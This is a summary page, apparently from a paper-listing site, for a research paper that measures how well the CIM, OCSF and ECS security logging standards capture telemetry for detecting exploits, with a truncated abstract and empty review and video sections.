Beyond Collection: Measuring the Detection Efficacy of Modern Security Logging Standards
Ryan Holeman, John Hastings, Varghese Mathew Vaidyan
TL;DR
This paper systematically evaluates the effectiveness of modern security logging standards using a novel automated framework, revealing significant differences and gaps in their ability to detect cyber exploits.
Contribution
It introduces a new scalable methodology for evaluating logging standards and provides evidence-based insights for security practitioners.
Findings
Significant differences in logging standards' ability to detect exploits.
Identification of critical gaps in current security logging frameworks.
Development of a reproducible evaluation methodology for exploit telemetry.
Abstract
Effective security logging is crucial for the timely and accurate detection of cyber threats; however, the relative effectiveness of various industry-standard logging frameworks remains understudied. This paper addresses this critical gap by presenting the first systematic evaluation of modern security logging standards utilizing a novel methodology built upon the automated Security Exploit Telemetry Collection (SETC) framework. SETC systematically generates reproducible exploit scenarios in containerized environments, collecting rich telemetry across multiple logging standards, including CIM (Common Information Model), OCSF (Open Cybersecurity Schema Framework), and ECS (Elastic Common Schema). The detection efficacy of each logging standard is quantified by measuring telemetry completeness and exploit detectability across standardized logs through detailed experiments involving 50…
Peer Reviews
No public reviews on file for this paper yet. If you reviewed it on a platform where reviews are public (OpenReview, ICLR, NeurIPS, ICML), you can paste yours below so the community can read it here.
Videos
No videos yet. Explain this paper in a talk, walkthrough, or lecture? Add one.